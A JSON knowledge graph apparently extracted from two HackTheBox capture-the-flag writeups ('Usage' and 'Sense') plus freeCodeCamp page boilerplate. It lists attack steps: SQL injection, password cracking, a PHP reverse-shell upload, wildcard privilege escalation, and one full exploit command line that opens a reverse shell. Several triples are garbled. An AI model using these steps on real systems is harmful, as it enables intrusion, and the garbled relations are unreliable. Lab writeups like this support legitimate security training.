{"graph_dict": {"Usage machine": [["Is", "Hackthebox writeup"], ["Involves", "Series of steps"], ["Penetrate", "Defenses"], ["Embark on", "Journey"], ["Utilize", "Nmap"], ["Scan", "Target ip"], ["Uncover", "Exposed services"], ["Presence of", "Website"], ["Explore", "Contents"], ["Visit", "Ip address"], ["Redirects", "Website named \u201cusage.htb\u201d"], ["Present", "Form"], ["Scrutinize", "Forms"], ["Susceptibility", "Sql injection vulnerabilities"], ["Testing", "Form"], ["Exhibits signs of", "Sql injection vulnerability"], ["Error responses", "Single quotes"], ["Employ", "Burp suite"], ["Intercept", "Requests"], ["Reveal", "Http post requests"], ["Automate", "Injection process"], ["Provide", "Intercepted request"], ["Execute", "Following command"], ["Facilitate", "Further exploration"], ["Proceed", "Extract database information"], ["Obtain", "List of databases"], ["Extract", "Table information"], ["Retrieve", "Data"], ["Admin_users", "Table"], ["Crack", "Password hash"], ["Execute", "Following command"], ["John", "Hash.txt"], ["Wordlist", "Rockyou.txt"], ["Instruct", "John the ripper"], ["Display", "Successfully cracked passwords"], ["Gain access to", "Admin dashboard"], ["Investigate", "Potential vulnerability"], ["Associated with", "Profile picture upload feature"], ["Arbitrary file upload vulnerability", "Laravel-admin v1.8.19"], ["Allows attackers", "Execute arbitrary"], ["Prepare", "Php file"], ["Containing", "Reverse shell payload"], ["Intend to upload", "Establish remote access"], ["Widely-used tool", "Php-reverse-shell"], ["Available at", "Github repository"], ["Modify", "Ip address"], ["Rename", "File extension"], ["Initiate", "Listener"], ["Upload", "Crafted php file"], ["Establish", "Remote connection"], ["Enabling", "Further exploration"], ["Exploitation of", "System"], ["Proceed with", "File upload process"], ["Intercept", "Upload request"], ["Modify", "File name"], ["Executes", "Reverse shell payload"]], "Github.com": [["Is", "Php reverse shell script"], ["Modify", "Ip address"], ["Modify", "Port parameters"], ["Match", "Listener setup"], ["Rename", "File extension"], ["Trick", "System"], ["Recognize", "Image file"], ["Upload", "Crafted php file"], ["Initiate", "Listener"], ["Upload", "Profile picture"], ["Establish", "Remote connection"], ["Exploration", "Web database"], ["Exploitation", "System"], ["Reverse shell setup", "Complete"], ["Proceed", "File upload process"], ["Intercept", "Upload request"], ["Modify", "File name"], ["Web server", "Recognize"], ["Execute", "Reverse shell payload"], ["Successful execution", "Uploaded file"], ["Gain", "Remote access"], ["Breakthrough", "Exploitation process"], ["Unauthorized entry", "System"], ["Gain", "User flag"], ["Shell stabilization", "Shell"], ["Adjustment", "Shell stabilization"], ["Uncovering", "User flag"], ["Curiosity", "User\u2019s dashboard"], ["Piques", "Interest"], ["\u201c.monitrc\u201d file", "Contents"], ["Examine", "\u201c.monitrc\u201d file"], ["Initiate", "Ssh connection"], ["User xander", "Insights"], ["Verify", "Sudo privileges"], ["Execute", "\u201csudo -l\u201d command"], ["Sudo privileges", "Execution"], ["Explore", "Sudo xander"], ["Explore", "\u201cproject backup\u201d option"], ["Custom website", "Default directories"], ["Turn", "Various resources"], ["Technique", "Hacktricks"], ["Leverage", "Wildcards"], ["Privilege escalation", "Wildcards"], ["Elevate", "Privileges"], ["Acquire", "\u201cid_rsa\u201d file"], ["Execute", "Commands"], ["Revisit", "Sudo command"], ["Backup attempt", "Outcome"], ["Obtaining", "Ssh private key"], ["Exploitation", "Ssh connection"], ["Copy", "Hash portion"], ["Save", "Original directory"], ["Adjust", "Permissions"], ["Establish", "Ssh connection"], ["Target system", "Authentication"], ["Privilege escalation", "Conclusion"], ["Identify", "Vulnerabilities"], ["Exploit", "Vulnerabilities"], ["Escalate", "Privileges"], ["Reconnaissance", "Importance"], ["Automated tools", "Importance"], ["Creative exploitation techniques", "Importance"], ["Cybersecurity endeavors", "Importance"], ["Learning", "Hackthebox penetration testing exploitation writeup htb writeup"]], "Hackthebox": [["Is", "Online hacking platform"], ["Allows you to test and practice", "Penetration testing skills"], ["Contains", "Vulnerable labs"], ["Simulate", "Real-world scenarios"], ["Lean towards", "Capture the flag style of challenge"]], "Write-ups": [["Are allowed", "Retired htb machines"]], "Walkthrough": [["Requires", "Hackthebox vip subscription"], ["Requires", "Kali linux operating system"], ["Requires", "Basic bruteforcing knowledge"]], "Sense": [["Is", "Machine"], ["Has", "Ip address 10.10.10.60"], ["Has", "Operating system freebsd"]], "Reconnaissance": [["Is", "Process of gathering information"], ["Is", "First step toward hack"]], "Nmap scan": [["Gather", "Information about open ports and services"], ["Running on", "Machine"], ["Result", "Shows open ports 80 and 443"]], "Port 80": [["Is", "Hyper text transfer protocol"]], "Port 443": [["Is", "Hyper text transfer protocol secured"]], "Visit": [["Ip address", "In browser"]], "Ip address": [["Leads to", "Pfsense login page"]], "Default credential": [["For pfsense", "Is admin/pfsense"]], "Directory brute force": [["Is used", "To find hidden directories"]], "Dirbuster": [["Is", "Used for directory brute force"]], "Changelog-txt": [["Contains", "Changelog.txt file"]], "System-user-txt": [["Contains", "System-user.txt file"]], "System-users.txt": [["Contains", "Username \"rohit\" and password \"company defaults"], ["Contains", "System-user.txt"], ["Contains", "Username \"rohit"], ["Contains", "Password \"company defaults"]], "Username \"rohit": [["Is", "Pfsense default password"]], "Rohit's dashboard": [["Contains", "Version number"]], "Version number": [["Is", "Obtained from admin page"], ["Is", "Vulnerable to"], ["Vulnerable to", "Command injection attack"]], "Searchsploit": [["Is", "Exploit-db command-line search tool"], ["Is", "Preinstalled in kali"], ["Is", "Exploit-db command-line search tool"], ["Comes", "Preinstalled in kali"], ["Provides", "Python exploit"]], "Company defaults": [["Equals", "Pfsense default password"]], "Username": [["Is", "Rohit"], ["Pasword", "Pfsense dashboard"]], "Rohit": [["Redirected to", "Dashboard"]], "Dashboard": [["Contains", "Version number"]], "Command injection attack": [["Allows", "Execute arbitrary os commands"], ["Happens when", "Unsanitized user input is passed"], ["Allows", "Execute arbitrary os commands"], ["Happens when", "Unsanitized user input is passed"]], "Command": [["Run", "Searchsploit pfsense"]], "Version": [["Is", "Vulnerable to"], ["Vulnerable to", "Command injection attack"]], "Exploit": [["Setup", "Netcat listener"], ["Fired", "Python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.12 --lport 9001 --username rohit --password pfsense"]], "Netcat": [["Is", "Network utility program"]], "Listener": [["Allows", "Listen on open ports"], ["Allows", "Create reverse shells"], ["Allows", "Send data or files over a network"]], "Shell": [["Is", "Obtained"], ["Is", "Not a pty shell"], ["Can't run", "Specific commands"], ["Can", "Grab any flag"], ["Move to", "Rohit directory"], ["Find", "User flag"]], "User flag": [["Is", "Obtained"]], "Root flag": [["Is", "Available"], ["Is", "Obtained"]], "Machine": [["Is", "Rooted"]], "Vulnerability": [["Can be prevented by", "Sanitize user input"], ["Can be prevented by", "Avoid calling os commands directly"], ["Can be prevented by", "Patch and update application often"]], "Author": [["Should be thanked", "If read this far"]], "Freecodecamp": [["Is", "Donor-supported tax-exempt 501(c"], ["Mission", "To help people learn to code for free"]], "Donations": [["Go toward", "Education initiatives"]], "Donation": [["Can be made", "Here"]], "Books and handbooks": [["Are", "Trending"]], "Programming": [["Is", "What"]], "Our charity": [["Is", "About alumni network"]], "Open source shop": [["Is", "Supported"]], "Support": [["Is", "Provided by sponsors"]], "Academic honesty": [["Is", "A code of conduct"]], "Privacy policy": [["Is", "A policy"]], "Terms of service": [["Is", "A policy"]], "Copyright policy": [["Is", "A policy"]]}}